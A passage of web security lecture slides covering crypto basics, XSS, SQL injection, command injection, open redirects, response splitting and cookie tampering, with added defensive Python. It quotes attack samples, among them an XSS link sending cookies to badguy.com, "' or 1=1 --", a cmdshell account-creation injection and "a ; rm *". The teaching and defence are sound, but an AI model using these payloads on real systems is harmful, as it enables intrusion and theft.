
CS6320 – Web Security, L. Grewe, modified from http://crypto.stanford.edu/cs155/

Slide 1: CS6320 – Web Security. L. Grewe. Modified from http://crypto.stanford.edu/cs155/

Slide 2: Issues
- Authentication, authorization
- Protecting your system against hackers
- Controlling access to critical data
- Controlling inbound versus outbound traffic
- Security versus accessibility tradeoffs
- Security versus capability tradeoffs
- Multi-tier versus single-tier solutions
- Security versus expense tradeoffs
- Security and capability versus administrative overhead and complexity

Slide 3: Solutions
- Software-based
- Hardware-based
- Freeware versus commercial products
- Use of security protocols
- Cryptography: converting messages to unreadable forms... and back
- Steganography: hiding the existence of a message

Slide 4: One issue... buffer overflow... things getting better
(Chart on slide; source: MITRE CVE trends.) The majority of vulnerabilities are now found in web software.

Slide 5: Example web site architecture with security components
(Diagram on slide.) Components shown: Intrusion Detection System, Application Firewall (WAF), Firewall, Load Balancer, web servers WS 1, WS 2 and WS 3, a second Firewall, App Servers with Authorization, and the DB.

Slide 6: Attacks on systems
Common web-site attacks:
- Denial of Service
- Attack the web server (IIS, Apache): e.g. control hijacking: CodeRed, Nimda, ...
Solutions:
- Harden the web server: StackGuard, libsafe, ...
- Worm defense: host-based intrusion detection, worm signature generation, shields.

Slide 7: Firewalls
- A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in hardware, in software, or in a combination of both.
- IP filtering (packet filtering): controls access solely by looking at the information contained in the IP header of the packets being sent to the server.
- Proxy servers / application firewalls.

Slide 8: Web Application Firewalls
- Prevent some attacks such as SQL injection, form field tampering and cookie poisoning.
- Some examples: Imperva, Kavado InterDo, F5 TrafficShield, Citrix NetScaler, CheckPoint Web Intelligence.

Slide 9: Message / information hiding
- Protect some information being sent from client to server and vice versa, through encryption.
- Some protocols such as SSL (Secure Sockets Layer) use encryption to perform a "secure" exchange of information.

Slide 10: Encryption
Convert normal, readable data into obscured, unreadable data.
(Diagram on slide.) "Hi There!!" -> Encryption Algorithm -> "m/okuGlilkdskuch"; "Hi There!!" -> Encryption Algorithm -> "alieka;wk12938*"

Slide 11: Decryption
Convert obscured, unreadable data back into normal, readable data.
(Diagram on slide.) "m/okuGlilkdskuch" -> Decryption Algorithm -> "Hi There!!"; "alieka;wk12938*" -> Decryption Algorithm -> "Hi There!!"

Slide 12: Terminology
- plaintext: clear, readable text
- ciphertext: unreadable text
- cipher: the algorithm(s) for encryption and decryption
(Diagram on slide.) "Hi There!!" -> Encryption Algorithm -> "alieka;wk12938*"; "alieka;wk12938*" -> Decryption Algorithm -> "Hi There!!"

Slide 13: Terminology
- Key: a secret piece of information that controls how the encryption algorithm works. Different keys produce different encrypted results.
(Diagram on slide.) "Hi There!!" with key "Citizen Kane" -> Encryption Algorithm -> "109291ala;dfwij?"; "Hi There!!" with key "Citizen Kano" -> Encryption Algorithm -> "398jfasd;k2//ad?"

Slide 14: Symmetric key technology
Alice wants to send a private/confidential message to Bob:
1. Alice computes c = crypt(message, key)
2. Alice sends c to Bob over the unsecured wire
3. Bob computes message = crypt(c, key)

Slide 15: Symmetric key application: password login
- Alice sends her password to the computer to prove her identity (authenticity).
- Problem: sniffing.
- Solution: challenge/response.
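The challenge/response idea in working form, as an added example written for this page (not code from the slides): the server sends a fresh random challenge, the client answers with an HMAC over that challenge keyed by the password, and the server recomputes it. A sniffed answer cannot be replayed because the next login gets a different challenge. The user name, password and the password store are constructed samples.

```python
import hashlib
import hmac
import secrets

# Constructed sample: in a real server the password itself is never stored
# in the clear; this keeps the exchange readable.
PASSWORD_DB = {"alice": b"correct horse battery staple"}


def server_issue_challenge() -> bytes:
    """Server picks a fresh, unpredictable nonce for every login attempt."""
    return secrets.token_bytes(16)


def client_respond(password: bytes, challenge: bytes) -> str:
    """Client proves it knows the password without putting it on the wire."""
    return hmac.new(password, challenge, hashlib.sha256).hexdigest()


def server_verify(user: str, challenge: bytes, response: str) -> bool:
    """Server recomputes the expected answer and compares in constant time."""
    secret = PASSWORD_DB.get(user)
    if secret is None:
        return False
    expected = hmac.new(secret, challenge, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, response)


def login_exchange(user: str, password: bytes) -> bool:
    """One complete login: challenge out, response back, verdict."""
    challenge = server_issue_challenge()
    response = client_respond(password, challenge)
    return server_verify(user, challenge, response)


def replay_is_rejected(user: str, password: bytes) -> bool:
    """An eavesdropper who captured (challenge, response) from one login
    cannot reuse the response: the server has moved on to a new challenge."""
    old_challenge = server_issue_challenge()
    sniffed_response = client_respond(password, old_challenge)
    new_challenge = server_issue_challenge()
    return old_challenge != new_challenge and not server_verify(
        user, new_challenge, sniffed_response)


if __name__ == "__main__":
    print("login ok:", login_exchange("alice", b"correct horse battery staple"))
    print("replay rejected:", replay_is_rejected("alice", b"correct horse battery staple"))
```

This stops replay of a sniffed login, which is the problem the slide names; it does not stop an eavesdropper from testing password guesses offline against the captured (challenge, response) pair, so password strength and rate limiting still matter.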

Slide 16: Shared secret key
A shared secret is great... but how do we distribute it?

Slide 17: Asymmetric key cryptography
- Instead of one key, have two: a public key and a private key.
- The public key is known to everyone; the private (secret) key is known only to the recipient of the message.
- When John wants to send a secure message to Jane, he uses Jane's public key to encrypt the message. Jane then uses her private key to decrypt it.
- Computing the private key from the public key is very, very difficult (factoring a huge number).

Slide 18: Asymmetric encryption example
1. John finds Jane.pub (Jane's public key) on her website (or she sends it to John in an email).
2. John computes c = crypt(message, Jane.pub).
3. John sends c to Jane over the unsecured wire.
4. Jane computes message = crypt(c, Jane.priv).

Slide 19: Advantages
- Key distribution is not a problem!
- Anyone can send a message to Jane; only Jane can decrypt it!

Slide 20: Asymmetric encryption for authentication
Alice wants to tell Bob the message is really from her: a digital signature.
1. Alice computes c = crypt(message, Alice.priv).
2. Alice sends c over the unsecured wire.
3. Anyone can check that Alice is the sender by computing message = crypt(c, Alice.pub).

Slides 21-26: Authenticity + secrecy (one diagram built up over six slides)
- Alice holds A.priv and the public keys A.pub, B.pub, ...; Bob holds B.priv; Carl & Eve are the bad people on the wire.
- Alice's message "I LUV U" is encrypted with B.pub, so only Bob can read it (secrecy).
- The note "This is from A" is processed with A.priv, as on slide 20, so Bob can check it with A.pub (authenticity).

Slide 27: Another solution: digital certificates
- A Certificate Authority (CA) publishes that a particular identity goes with a particular public key.
- Alice gets a certificate (identity, public key) signed by the CA.
- So if you trust the CA, then you can trust the public key.

Slide 28: SSL... the idea
1. Jane connects to John's server.
2. John's server returns its certificate (signed by VeriSign), plus something encrypted with John.priv.
3. Jane can verify that the certificate is valid, and uses the public key to decrypt the token: John is authenticated.
4. Jane makes a one-time session key k, encrypts it with John's public key and sends it to John.
5. Now they can use symmetric key cryptography.
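Slides 17 through 28 in one runnable sketch, added for this page and not part of the original slides: textbook RSA on tiny constructed primes written in the slides' crypt(message, key) notation, used for encryption (slide 18), signing (slide 20), a CA-signed certificate (slide 27) and the session-key handshake of slide 28. The prime values, the identity string "john.example" and the function names are all assumptions of this example; real systems use keys of about 2048 bits, padding (OAEP/PSS) and a vetted library, never hand-rolled RSA.

```python
import hashlib
import secrets


def make_keypair(p: int, q: int, e: int = 17):
    """Return (public, private); each key is a (modulus, exponent) pair."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))      # e * d == 1 (mod phi(n))
    return (n, e), (n, d)


def crypt(m: int, key) -> int:
    """The slides' crypt(): one modular exponentiation; the public exponent
    encrypts/verifies, the private exponent decrypts/signs."""
    n, exponent = key
    if not 0 <= m < n:
        raise ValueError("value must be smaller than the modulus")
    return pow(m, exponent, n)


def digest(data: bytes, n: int) -> int:
    """Hash the data and reduce it into the key's range so it can be signed."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data: bytes, priv) -> int:
    return crypt(digest(data, priv[0]), priv)


def verify(data: bytes, sig: int, pub) -> bool:
    if not 0 <= sig < pub[0]:
        return False
    return crypt(sig, pub) == digest(data, pub[0])


def make_certificate(identity: str, subject_pub, ca_priv):
    """Slide 27: the CA signs the statement 'identity goes with this key'."""
    body = f"{identity}|{subject_pub[0]}|{subject_pub[1]}".encode()
    return (identity, subject_pub, sign(body, ca_priv))


def verify_certificate(cert, ca_pub) -> bool:
    identity, subject_pub, sig = cert
    body = f"{identity}|{subject_pub[0]}|{subject_pub[1]}".encode()
    return verify(body, sig, ca_pub)


def ssl_idea(john_cert, john_priv, ca_pub):
    """Slide 28 in miniature. Returns (john_authenticated, session_key)."""
    if not verify_certificate(john_cert, ca_pub):   # Jane: is this John's key?
        return False, None
    _, john_pub, _ = john_cert
    n = john_pub[0]
    # John proves he holds John.priv: Jane picks a token, John transforms it
    # with John.priv, and Jane undoes the transform with John.pub.
    token = secrets.randbelow(n)
    proof = crypt(token, john_priv)             # John's side
    if crypt(proof, john_pub) != token:         # Jane's side
        return False, None
    # Jane makes a one-time session key and sends it encrypted under John.pub.
    k_jane = secrets.randbelow(n - 2) + 2
    k_john = crypt(crypt(k_jane, john_pub), john_priv)   # John recovers k
    # From here on both sides can switch to symmetric cryptography with k.
    return k_jane == k_john, k_jane


# Constructed toy keys (tiny primes, illustration only).
CA_PUB, CA_PRIV = make_keypair(89, 97)
JOHN_PUB, JOHN_PRIV = make_keypair(61, 53)
JOHN_CERT = make_certificate("john.example", JOHN_PUB, CA_PRIV)
BOGUS_PUB, BOGUS_PRIV = make_keypair(101, 107)   # a key no trusted CA vouches for

if __name__ == "__main__":
    c = crypt(42, JOHN_PUB)                          # John -> Jane, slide 18
    print("decrypts to", crypt(c, JOHN_PRIV))
    s = sign(b"I LUV U", JOHN_PRIV)                  # slide 20
    print("signature valid:", verify(b"I LUV U", s, JOHN_PUB))
    print("handshake:", ssl_idea(JOHN_CERT, JOHN_PRIV, CA_PUB))
```

The same crypt() serves every step, which is the point the slides make with one function name; what changes is which half of the key pair is used and who holds it.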

Slide 29: Attacks...
- There are many kinds of attacks that hackers have carried out.
- We will mention some more weaknesses here... but take a class on security, cryptography, etc. to get into more detail.

Slide 30: Attack: Denial of Service
- Make the service unavailable with a flood of incoming traffic.
- Use a robot to launch the DoS against the server; it is hard to trace the identity of the attacker.
- Distributed DoS (DDoS): take over many machines and launch the attack simultaneously from many locations.

Slide 31: Attack: Buffer overflow
- The bad guy sends a huge, over-sized request to a naively implemented (aka buggy) program, overflowing the input buffer.
- May overwrite data in memory and/or program code.
- May overwrite the return address on the stack of a C program, so that the procedure call returns somewhere else.

Slide 32: How to avoid buffer overflow
- Write code carefully.
- Limit input size; read in small chunks rather than reading in the whole input.
- Use better languages (e.g. Java).

Slide 33: Another problem: what about all of the web application code???
- Runs on the web server or app server.
- Takes input from web users (via the web server).
- Interacts with the database and 3rd parties.
- Prepares results for users (via the web server).
- Examples: shopping carts, home banking, bill pay, tax prep, ...
- New code is written for every web site.
- Written in C, PHP, Perl, Python, JSP, ASP, ...
- Often written with little consideration for security.

Slide 34: Web application problems
- Inadequate validation of user input: cross site scripting, SQL injection, HTTP splitting.
- Broken session management: can lead to session hijacking and data theft.
- Insecure storage: sensitive data stored in the clear; a prime target for theft (e.g. Egghead, Verizon). Note: PCI Data Security Standard (Visa, Mastercard).

Slide 35: A simple example
Direct use of user input:
    http://victim.com/copy.php?name=username
    copy.php: system("cp temp.dat $name.dat")
(Diagram labels: "script name" for copy.php, "script input" for the name parameter.)
Problem:
    http://victim.com/copy.php?name="a ; rm *"
    (should be: name=a%20;%20rm%20*)
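The copy.php problem and its fix, as an added example not from the slides: the vulnerable form splices the name parameter into a shell command line, so ";" ends the intended command and starts another. The hardened form allow-lists the parameter and runs the command as an argv list without a shell. The allow-list here goes slightly beyond the slide in that it also rejects "." and path separators, which closes the path-traversal variant of the same bug. The file names, the regular expression and the function names are assumptions of this example.

```python
import re
import subprocess

# Allow-list for the `name` parameter: letters, digits, '-' and '_' only.
# No '.', '/', ';', '$', spaces or quotes, so neither "a ; rm *" nor
# "../../etc/passwd" survives validation.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_copy_command(name: str) -> str:
    """What the slide's copy.php hands to the shell: the raw parameter is
    spliced into the command line, so ';' starts a second command."""
    return f"cp temp.dat {name}.dat"


def build_copy_argv(name: str) -> list:
    """Hardened form: validate against the allow-list, then build an argv
    list. A list passed to subprocess is never parsed by a shell, so the
    value is one argument to cp and nothing else."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected name parameter: {name!r}")
    return ["cp", "temp.dat", f"{name}.dat"]


def copy_for_user(name: str, workdir: str) -> int:
    """Run the hardened command (shell=False) in a fixed working directory;
    returns cp's exit status."""
    return subprocess.run(build_copy_argv(name), cwd=workdir,
                          check=False).returncode


def classify(name: str) -> str:
    """Report how the hardened path treats a given parameter value."""
    try:
        build_copy_argv(name)
        return "accepted"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    for sample in ["report1", "a ; rm *", "../../etc/passwd", "a$(id)"]:
        print(f"{sample!r:24} shell line: {vulnerable_copy_command(sample)!r:40} "
              f"hardened: {classify(sample)}")
```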

Slide 36: Redirects
- EZShopper.com shopping cart (10/2004): http://.../cgi-bin/loadpage.cgi?page=url redirects the browser to url.
- Redirects are common on many sites: used to track when a user clicks on an external link; EZShopper uses the redirect to add HTTP headers.
- Problem: phishing. http://victim.com/cgi-bin/loadpage?page=phisher.com: a link to victim.com puts the user at phisher.com.
- Local redirects should ensure the target URL is local.
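A check for "the target URL is local", added as an example for this page (not the EZShopper code and not from the slides). It accepts only an absolute path on the same site and rejects the cases that commonly slip past a naive "does it start with a slash" test: protocol-relative "//host", the "///host" form that browsers collapse to "//host", backslashes that some browsers treat as slashes, and CR/LF that would corrupt the Location header. The function names and the fallback path are assumptions of this example.

```python
from urllib.parse import urlsplit


def is_local_redirect(target: str) -> bool:
    """True only for a path on this site, e.g. '/account?tab=orders'."""
    if not target.startswith("/"):
        return False              # "phisher.com", "http://..." and "javascript:..."
    if len(target) > 1 and target[1] in "/\\":
        return False              # "//host", "///host" and "/\host" change origin
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return False              # belt and braces: urlsplit found an authority
    if any(c in target for c in "\r\n"):
        return False              # never let CR/LF reach a Location header
    return True


def redirect_location(page: str, fallback: str = "/") -> str:
    """Value to place in the Location header for loadpage.cgi?page=...:
    the requested page if it is local, otherwise a safe default."""
    return page if is_local_redirect(page) else fallback


if __name__ == "__main__":
    for sample in ["/account?tab=orders", "phisher.com", "http://phisher.com/",
                   "//phisher.com", "///phisher.com", "/\\phisher.com"]:
        print(f"{sample!r:24} -> Location: {redirect_location(sample)}")
```

Where the redirect genuinely needs to reach external sites (the click-tracking case on the slide), the alternative is an allow-list of permitted hosts rather than trusting the parameter.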

Slide 37: Cross Site Scripting (XSS)

Slide 38: The setup
- User input is echoed into the HTML response.
- Example: a search field: http://victim.com/search.php?term=apple
- search.php responds with: Search Results <BODY> Results for (the echoed term): ...
- Is this exploitable?

Slide 39: Answer... bad input
- Problem: no validation of the input term.
- Consider this link (properly URL encoded): http://victim.com/search.php?term=window.open("http://badguy.com?cookie=" + document.cookie)
- What if the user clicks on this link?
  1. The browser goes to victim.com/search.php.
  2. victim.com returns "Results for ..." with the term echoed.
  3. The browser executes the script, which sends badguy.com the cookie for victim.com.

Slide 40: What is the problem?
- Why would a user click on such a link? A phishing email in a webmail client (e.g. Gmail); a link in a DoubleClick banner ad; ... many, many ways to fool a user into clicking.
- What if badguy.com gets the cookie for victim.com? The cookie can include the session authenticator for victim.com, or other data intended only for victim.com.
- This violates the same origin policy.

Slide 41: Worse...
- The attacker can execute arbitrary scripts in the browser and manipulate any DOM component on victim.com: control links on the page; control form fields (e.g. the password field) on this page and on linked pages.
- Example: inject a password field that sends the password to the bad guy.
- Can infect other users: the MySpace.com worm.

Slide 42: MySpace.com (Samy worm)
- Users can post HTML on their pages.
- MySpace.com ensures the HTML contains none of its blocked tags and handlers (onclick, ...)
- ... but JavaScript can be placed within CSS tags, and "javascript" can be hidden as "java\nscript".
- With careful JavaScript hacking, Samy's worm infects anyone who visits an infected MySpace page... and adds Samy as a friend. Samy had millions of friends within 24 hours.
- More info: http://namb.la/popular/tech.html

Slide 43: Avoiding XSS bugs (PHP)
- Main problem: input checking is difficult; there are many ways to inject scripts into HTML.
- Preprocess input from the user before echoing it. PHP: htmlspecialchars(string) replaces & with &amp;, " with &quot;, ' with &#039;, < with &lt; and > with &gt;.
- htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES) outputs: &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;

Slide 44: httpOnly cookies (IE)
- (Diagram: the browser sends GET ...; the server replies with the HTTP header Set-Cookie: NAME=VALUE; HttpOnly.)
- The cookie is sent over HTTP(S), but is not accessible to scripts: it cannot be read via document.cookie.
- Helps prevent cookie theft via XSS... but does not stop most other risks of XSS bugs.
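Slides 43 and 44 together, as an added Python example that is not part of the slides: the search page from slide 38 rendered once with the term echoed verbatim and once through an htmlspecialchars equivalent (Python's html.escape with quote=True, which writes the single quote as &#x27; where PHP writes &#039;; browsers treat both the same), plus the Set-Cookie header with HttpOnly from slide 44. The sample term mirrors the slide-39 link; the page markup, cookie name and function names are assumptions of this example.

```python
import html
from http.cookies import SimpleCookie


def render_results_unsafe(term: str) -> str:
    """The slide's search.php: the term is echoed verbatim into the page."""
    return f"<TITLE>Search Results</TITLE><BODY>Results for {term}: ...</BODY>"


def htmlspecialchars(s: str) -> str:
    """Python stand-in for PHP htmlspecialchars($s, ENT_QUOTES):
    escapes & < > and both kinds of quote."""
    return html.escape(s, quote=True)


def render_results(term: str) -> str:
    """Same page, with the term escaped before it is echoed. The browser
    shows the characters the user typed; it never parses them as markup."""
    return (f"<TITLE>Search Results</TITLE><BODY>Results for "
            f"{htmlspecialchars(term)}: ...</BODY>")


def set_cookie_header(name: str, value: str) -> str:
    """Slide 44: a Set-Cookie header carrying HttpOnly (plus Secure and
    Path). The browser still sends the cookie with requests, but
    document.cookie cannot read it, so an injected script cannot steal it."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["path"] = "/"
    return jar.output(header="Set-Cookie:")


def contains_script_tag(page: str) -> bool:
    """Quick check used below: would a browser see a <script> element?"""
    return "<script" in page.lower()


# Constructed sample modelled on the slide-39 link.
SAMPLE_TERM = ('<script>window.open("http://badguy.com?cookie="'
               ' + document.cookie)</script>')

if __name__ == "__main__":
    print("unsafe page runs script:", contains_script_tag(render_results_unsafe(SAMPLE_TERM)))
    print("escaped page runs script:", contains_script_tag(render_results(SAMPLE_TERM)))
    print(set_cookie_header("auth", "abc123"))
```

Escaping at the point of output is the fix; HttpOnly only limits what a successful injection can reach, which is why the slide calls it a help and not a cure.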

Slide 45: SQL Injection

Slide 46: The setup
- User input is used in a SQL query.
- Example: login page (in ASP):

    set ok = execute("SELECT * FROM UserTable WHERE username=' " & form("user") & " ' AND password=' " & form("pwd") & " ' ");
    if not ok.EOF
        login success
    else fail;

- Is this a problem?

Slide 47: The problem... bad input
- Suppose user = " ' or 1=1 -- " (URL encoded). Then the script does:
    ok = execute( SELECT ... WHERE username=' ' or 1=1 -- ... )
- The "--" causes the rest of the line to be ignored. Now ok.EOF is always false.
- The bad news: easy login to many sites this way.

Slide 48: Worse...
- Suppose user = " ' exec cmdshell 'net user badguy badpwd' /ADD -- ". Then the script does:
    ok = execute( SELECT ... WHERE username=' ' exec ... )
- If the SQL server context runs as "sa", the attacker gets an account on the DB server.

Slide 49: Avoiding SQL injection
- Build SQL queries by properly escaping arguments: ' -> \'
- Example: parameterized SQL (ASP.NET 1.1) ensures SQL arguments are properly escaped:

    SqlCommand cmd = new SqlCommand(
        "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd",
        dbConnection);
    cmd.Parameters.Add("@User", Request["user"]);
    cmd.Parameters.Add("@Pwd", Request["pwd"]);
    cmd.ExecuteReader();

- In PHP: bound parameters, a similar function.
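Slides 46 through 49 run end to end, as an added example that is not from the slides: the ASP login translated to Python over an in-memory SQLite table, once with the input concatenated into the SQL text and once with bound parameters, driven by the slide-47 input. The table contents, the account and the function names are constructed for this example; a real server stores salted password hashes, not the passwords themselves.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for UserTable with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE UserTable (username TEXT, password TEXT)")
    db.execute("INSERT INTO UserTable VALUES ('alice', 's3cret')")
    return db


def vulnerable_query_text(user: str, pwd: str) -> str:
    """Exactly what the slide's ASP code builds: input pasted into SQL."""
    return ("SELECT * FROM UserTable WHERE username='" + user +
            "' AND password='" + pwd + "'")


def login_vulnerable(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Slide 46: a quote in the input ends the string literal, '--' comments
    out the password check, and 'or 1=1' matches every row."""
    return db.execute(vulnerable_query_text(user, pwd)).fetchone() is not None


def login_parameterized(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Slide 49: the driver sends values separately from the SQL text, so
    quotes and '--' inside the input are data, never syntax."""
    sql = "SELECT * FROM UserTable WHERE username=? AND password=?"
    return db.execute(sql, (user, pwd)).fetchone() is not None


# Constructed inputs: the slide-47 value and an honest login.
INJECTED_USER = "' or 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query_text(INJECTED_USER, "anything"))
    print("concatenated SQL, injected input  :", login_vulnerable(db, INJECTED_USER, "anything"))
    print("parameterized SQL, injected input :", login_parameterized(db, INJECTED_USER, "anything"))
    print("parameterized SQL, real credentials:", login_parameterized(db, "alice", "s3cret"))
```

The "escape the quote" approach the slide lists first is fragile because the escaping rules differ per database (SQLite and most SQL dialects double the quote rather than backslash it); parameters sidestep that entirely.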

Slide 50: HTTP Response Splitting

Slide 51: The setup
- User input is echoed in an HTTP header.
- Example: language redirect page (JSP). The browser sends http://.../by_lang.jsp?lang=french and the server's HTTP response is:
    HTTP/1.1 302 (redirect)
    Date: ...
    Location: /by_lang.jsp?lang=french
- Is this a problem?

Slide 52: The problem... bad input
Suppose the browser sends (URL encoded):
    http://.../by_lang.jsp?lang="french \n Content-length: 0 \r\n\r\n HTTP/1.1 200 OK Spoofed page"

Slide 53: Bad input
The HTTP response from the server looks like:
    HTTP/1.1 302 (redirect)
    Date: ...
    Location: /by_lang.jsp?lang=french
    Content-length: 0

    HTTP/1.1 200 OK
    Content-length: 217
    Spoofed page

Slide 54: So what?
What just happened:
- The attacker submitted a bad URL to victim.com; the URL contained a spoofed page in it, and the attacker got back the spoofed page.
So what?
- Cache servers along the path now store the spoof of victim.com, which will fool any user using the same cache server.
- Defense: don't do that (don't echo user input into HTTP headers).
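Slides 51 through 54 in code, added for this page and not from the slides: the by_lang.jsp redirect built the vulnerable way and the hardened way, fed the slide-52 input, and a small counter that reports how many HTTP responses a cache or proxy would see in the resulting bytes. The hardened version percent-encodes the parameter (CR and LF become %0D%0A) and then refuses any assembled header value that still contains a control character. The payload bytes, status line wording and function names are constructed for this example.

```python
from urllib.parse import quote


def build_redirect_vulnerable(lang: str) -> bytes:
    """The slide's by_lang.jsp: the parameter lands in Location unchanged."""
    return ("HTTP/1.1 302 Found\r\nLocation: /by_lang.jsp?lang=" + lang +
            "\r\n\r\n").encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """A header value may never carry CR, LF or NUL."""
    return not any(c in value for c in "\r\n\0")


def build_redirect(lang: str) -> bytes:
    """Hardened: encode the parameter for the URL, then re-check the whole
    header value before emitting it (defense in depth)."""
    location = "/by_lang.jsp?lang=" + quote(lang, safe="")
    if not is_safe_header_value(location):
        raise ValueError("control character in Location header")
    return ("HTTP/1.1 302 Found\r\nLocation: " + location +
            "\r\n\r\n").encode("ascii")


def count_responses(raw: bytes) -> int:
    """How many HTTP responses a proxy or cache would see in these bytes."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1.1 "))


# Constructed input modelled on slide 52, already URL-decoded by the server.
SPLIT_PAYLOAD = ("french\r\nContent-Length: 0\r\n\r\n"
                 "HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\nSpoofed page")

if __name__ == "__main__":
    print("vulnerable, injected:", count_responses(build_redirect_vulnerable(SPLIT_PAYLOAD)), "responses")
    print("hardened, injected  :", count_responses(build_redirect(SPLIT_PAYLOAD)), "response")
    print(build_redirect(SPLIT_PAYLOAD).decode())
```

Most modern web frameworks apply the second check (rejecting CR/LF in header values) on their own; the encoding step is still the application's job, because without it the request would be refused instead of served correctly.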

Slide 55: App code
- A little programming knowledge can be dangerous: cross site scripting, SQL injection, HTTP splitting.
- What to do?
  - Band-aid: a Web App Firewall (WAF) looks for attack patterns and blocks requests; false positives / false negatives.
  - Code checking.

Slide 56: Code checking
- Blackbox security testing services: Whitehatsec.com
- Automated blackbox testing tools: Cenzic Hailstorm; SPI Dynamics WebInspect; eEye Retina
- Web application hardening tools: WebSSARI [WWW'04], based on information flow; Nguyen-Tuong [IFIP'05], based on tainting.

Slide 57: Session management: cookies, hidden fields, and user authentication

Slide 58: Cookie risks
- Danger of storing data on the browser: the user can change the values.
- Silly example: shopping cart software sets Set-Cookie: shopping-cart-total=150 ($). The user edits the cookie file (cookie poisoning) and sends Cookie: shopping-cart-total=15 ($)... bargain shopping.
- Similar behavior with hidden fields.

Slide 59: Not so silly... some real sites had this issue
- D3.COM Pty Ltd: ShopFactory 5.8
- @Retail Corporation: @Retail
- Adgrafix: Check It Out
- Baron Consulting Group: WebSite Tool
- ComCity Corporation: SalesCart
- Crested Butte Software: EasyCart
- Dansie.net: Dansie Shopping Cart
- Intelligent Vending Systems: Intellivend
- Make-a-Store: Make-a-Store OrderPage
- McMurtrey/Whitaker & Associates: Cart32 3.0
- pknutsen@nethut.no: CartMan 1.04
- Rich Media Technologies: JustAddCommerce 5.0
- SmartCart: SmartCart
- Web Express: Shoptron 1.2

Slide 60: Solution
- When storing state on the browser, MAC the data using a server secret key.
- .NET 2.0: System.Web.Configuration.MachineKey is a secret web server key intended for cookie protection:

    HttpCookie cookie = new HttpCookie(name, val);
    HttpCookie encodedCookie = HttpSecureCookie.Encode(cookie);
    HttpSecureCookie.Decode(cookie);
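What HttpSecureCookie.Encode and Decode do, shown as an added Python example (not the .NET implementation and not from the slides): the server appends an HMAC under its secret key to the cookie value, and on the way back recomputes the tag and accepts the value only if it matches. The MAC covers the cookie name as well, so a valid tag cannot be moved from one cookie to another. The key, cookie name and function names are constructed for this example.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for the server's MachineKey: generated at start-up
# here; in a real deployment it is fixed, secret and never sent to clients.
SERVER_KEY = secrets.token_bytes(32)


def _mac(name: str, value: str, key: bytes) -> str:
    # Binding the cookie name prevents moving a valid tag to another cookie.
    return hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()


def encode_cookie(name: str, value: str, key: bytes = SERVER_KEY) -> str:
    """Cookie value plus its MAC: the role of HttpSecureCookie.Encode."""
    return f"{value}|{_mac(name, value, key)}"


def decode_cookie(name: str, cookie_value: str, key: bytes = SERVER_KEY):
    """Return the original value, or None if the MAC is missing or wrong:
    the role of HttpSecureCookie.Decode."""
    value, sep, tag = cookie_value.rpartition("|")
    if not sep or not hmac.compare_digest(_mac(name, value, key), tag):
        return None
    return value


def cart_total_from_cookie(cookie_value: str) -> int:
    """Server-side use for the slide-58 cart: trust the total only if the
    tag verifies; an edited value fails the check and is rejected."""
    value = decode_cookie("shopping-cart-total", cookie_value)
    if value is None:
        raise ValueError("cookie rejected: missing or invalid MAC")
    return int(value)


if __name__ == "__main__":
    issued = encode_cookie("shopping-cart-total", "150")
    print("Set-Cookie: shopping-cart-total=" + issued)
    edited = "15|" + issued.split("|", 1)[1]     # the slide-58 edit
    print("honest cookie decodes to:", decode_cookie("shopping-cart-total", issued))
    print("edited cookie decodes to:", decode_cookie("shopping-cart-total", edited))
```

A MAC gives integrity, not secrecy: the client can still read the value. If the value must be hidden, encrypt it as well, and add an expiry or user binding if replaying an old but valid cookie would matter.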

Slide 61: Cookie authentication
(Sequence diagram on slide: Browser, Web Server, Auth server.)
1. Browser -> Web Server: POST login.cgi with username & pwd.
2. Web Server -> Auth server: validate user.
3. Auth server -> Web Server: auth=val (the Auth server stores val).
4. Web Server -> Browser: Set-cookie: auth=val.
5. Browser -> Web Server: GET restricted.html with Cookie: auth=val.
6. Web Server -> Auth server: auth=val; the Auth server checks val and answers YES/NO.
7. If YES, the Web Server returns restricted.html.

Slide 62: Weak authenticators: security risk
- Predictable cookie authenticator: Verizon Wireless used a counter. A valid user logs in, gets the counter, and can view the sessions of other users.
- Weak authenticator generation [Fu et al. '01]: WSJ.com cookie = {user, MAC_k(user)}; the weak MAC exposes k from a few cookies.
- Apache Tomcat generateSessionID(): MD5(PRNG)... but a weak PRNG [GM'05] gives predictable session IDs.
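The slide-61 flow with the two kinds of authenticator from slide 62 side by side, as an added example that is not from the slides: one auth server hands out a counter (the Verizon Wireless pattern), the other hands out 256 bits from the operating system's CSPRNG, and a tiny request handler reads auth=val from the Cookie header and asks the auth server whether it is live. A small audit helper shows how a reviewer can spot counter-style authenticators from a few issued values. The account, cookie name and class names are constructed for this example.

```python
import secrets
from http.cookies import SimpleCookie

USERS = {"alice": "s3cret"}   # constructed; real servers store salted hashes


class CounterAuthServer:
    """The predictable scheme from the slide: the authenticator is a counter,
    so anyone holding one value can derive the values issued to others."""

    def __init__(self):
        self._next = 1000
        self._sessions = {}

    def login(self, user: str, pwd: str):
        if USERS.get(user) != pwd:
            return None
        self._next += 1
        self._sessions[str(self._next)] = user
        return str(self._next)

    def check(self, val: str):
        """The YES/NO step: which user, if any, does this value belong to?"""
        return self._sessions.get(val)


class RandomAuthServer(CounterAuthServer):
    """Same interface, but the authenticator is 256 random bits, so holding
    one value says nothing about any other."""

    def login(self, user: str, pwd: str):
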